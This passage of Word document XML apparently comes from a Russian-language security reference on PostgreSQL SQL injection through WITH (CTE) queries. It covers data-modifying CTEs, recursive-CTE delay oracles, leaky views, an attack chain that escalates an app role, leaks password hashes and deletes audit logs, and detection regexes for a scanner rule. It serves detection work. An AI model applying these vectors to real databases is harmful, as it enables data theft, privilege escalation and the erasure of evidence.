          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CTE всегда materialized → дефолтная защита от Payload B; но прямой Payload A без CTE — работает.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 Provider-специфики нет.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — главный канал извлечения данных через leaky-функцию. Функция RAISE EXCEPTION с leaked-данными — error-based oracle.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 (plperlu untrusted) / 3.7.3 (plpython3u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернативная среда для создания leaky-функции с side-effects (HTTP-callback вместо RAISE).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3.8.2 (pg_proc разведка)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.proleakproof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> чтобы найти существующие LEAKPROOF-функции — кандидаты для злоупотребления без CREATE.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3.10.1 (Data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CTE с DML внутри + leaky функция вне — write через push-down side-effect. CTE-инжекция комбо: смесь write и read.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3.10.2 (Recursive CTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — recursive amplify для leak-функции: каждая итерация — отдельный вызов leak() на чужой строке, экспоненциальная компрессия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пререквизит для Payload C (создание LEAKPROOF-функции требует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3.17.x (RLS bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — соседний класс, в чём-то пересекается. RLS — отдельный механизм с собственными bypass-CVE (R9, R11). Граница: 3.10.3 — про view ACL (WHERE-в-view), 3.17 — про RLS policies на таблицах. Атакующий часто комбинирует: leak через view → RLS-protected таблица → SET ROLE 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регекса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bWITH\b.*?\bNOT\s+MATERIALIZED\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (явный NOT MATERIALIZED — explicit anti-protection), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b.*?\bLEAKPROOF\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (создание LEAKPROOF-функции — pre-attack setup), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bCOST\s+0\.\d{4,}\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (экстремально низкая cost — pushdown-bait) — ни одного из этих детекторов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3.10 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.10.md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Rules and Privileges — Updatable Views, security_barrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier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CREATE FUNCTION — LEAKPROOF, COST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LEAKPROOF</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COST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WITH Queries — Materialization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — MATERIALIZED/NOT MATERIALIZED.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Wiki: Leaky views</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — backgrounder.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Andres Freund — Pushing optimization fences in PostgreSQL 12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — анонс CTE-inline в PG 12.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Tom Lane explanation: CVE-2017-7484 и leaky operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оригинальный security-context.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 exploiting database-specific features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.10 разобраны три PG-специфичных вектора атаки через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-конструкцию (CTE), которые объединяет то, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">синтаксически это одна команда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — проходит через extended-protocol-блокировки stacked-queries (см. 3.5), и при этом несёт побочный эффект, выходящий за рамки обычного SELECT.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3.10.1 Data-modifying CTE (R22)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WITH ins AS (INSERT|UPDATE|DELETE ... RETURNING) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Write-смug через SELECT-эндпоинт, не блокируется extended-protocol. Три карточки: INSERT в audit-log для подделки следов, UPDATE для эскалации в application-roli, DELETE для уничтожения evidence.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3.10.2 CTE как амплификатор time-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — recursive CTE / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">generate_series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regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ReDoS) / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgcrypto.crypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как альтернативные delay-примитивы для 3.4 (time-based blind), когда WAF блокирует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Четыре карточки с разными trade-off-ами по compactness / detection / DoS-risk.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3.10.3 Leaky views + CTE materialization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт!) + injection в WHERE с leaky-функцией → push-down предиката перед view-фильтром, leak строк. CTE с явным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт PG 12+) гарантирует inline, обходя попытку защиты через CTE-обёртку. Три карточки: прямой leak, обход CTE-«защиты», обход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через SUPERUSER + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEAKPROOF</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Сравнение векторов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Что делает</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 привилегия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Блокируется extended-protocol?</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Версии-применимость</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3.10.1 INSERT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Запись в audit/log таблицы</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INSERT на target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9.1+ (все)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3.10.1 UPDATE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Эскалация в app-роли + leak RETURNING</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UPDATE на target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9.1+ (все)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3.10.1 DELETE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Удаление evidence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DELETE на target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9.1+ (все)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3.10.2 Recursive CTE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Delay без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_sleep</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8.4+ (все)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3.10.2 generate_series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Delay без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_sleep</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9.1+ (все)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3.10.2 regexp ReDoS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DoS-risk delay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9.x+</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3.10.2 pgcrypto crypt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Calibrated bcrypt delay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 pgcrypto</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8.x+</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3.10.3 Direct leak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Leak строк через push-down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SELECT view + CREATE FUNCTION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 (CTE inline); 9.2+ (security_barrier механизм)</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3.10.3 NOT MATERIALIZED обход</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Обход CTE-«защиты»</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3.10.3 LEAKPROOF обход</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Обход security_barrier=on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SUPERUSER (для CREATE LEAKPROOF)</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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевое свойство: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ни один из 3.10-векторов не блокируется extended-protocol-stacking-ограничением</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это делает категорию принципиально опаснее 3.5: где 3.5 проходит только на драйверах в simple-protocol-режиме, 3.10 проходит везде.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий после получения точки инъекции в SELECT-эндпоинте идёт по следующему шаблону:</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3.10.1 recon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пытается INSERT в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(если таблица существует и app-роль имеет права) → write-канал подтверждён.</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3.10.2 для blind-уровневой разведки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если ответ HTTP не возвращает данные напрямую, использует recursive CTE как time-oracle для извлечения метаданных (см. 3.8): version, current_user, current_database().</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3.10.1 UPDATE для эскалации в app-роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UPDATE users SET role='admin' WHERE id=2.</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3.10.3 для leak строк скрытых view-фильтром</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если в системе есть view с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (типичный default), leak через leaky-функцию → утечка password_hash, ssn, internal_notes.</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3.10.1 DELETE для уничтожения следов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — очистка audit_log от записи о вставленной строке через шаг (1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После этого — переход к 3.6 (OOB), 3.13 (escalation в PG-роли), 3.17 (RLS bypass) — каждое использует CTE как транспорт.</w:t>
      </w:r>
    </w:p>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 vs 3.10.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закреплено в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: stacked = несколько команд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3.10.1 = одна команда с WITH ... INSERT/UPDATE/DELETE. Разница критическая: 3.5 блокируется extended-protocol, 3.10 — нет.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(Time-based blind) vs 3.10.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.4 предполагает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3.10.2 — альтернативы. Если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доступен — 3.4; если в WAF blacklist — 3.10.2.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 (RLS bypass) vs 3.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — близкие концепции, разные механизмы. RLS — отдельная фича PG (CREATE POLICY), её bypass через CVE (R9, R11) разбирается в 3.17. View ACL — другой механизм (WHERE-фильтр внутри view); 3.10.3 — bypass через push-down и materialization control.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 (Metadata) — потребитель 3.10.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: blind-разведка метаданных через CTE-time-oracle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса CTE_SIDE_EFFECTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный regex по всем трём подразделам 3.10. Структура такая же, как для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в summary-3.6 и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FILTER_BYPASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в summary-3.9.</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CTE_SIDE_EFFECTS = "cte_side_effects"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VulnerabilityClass.CTE_SIDE_EFFECTS: 8,</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"cte_dml": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
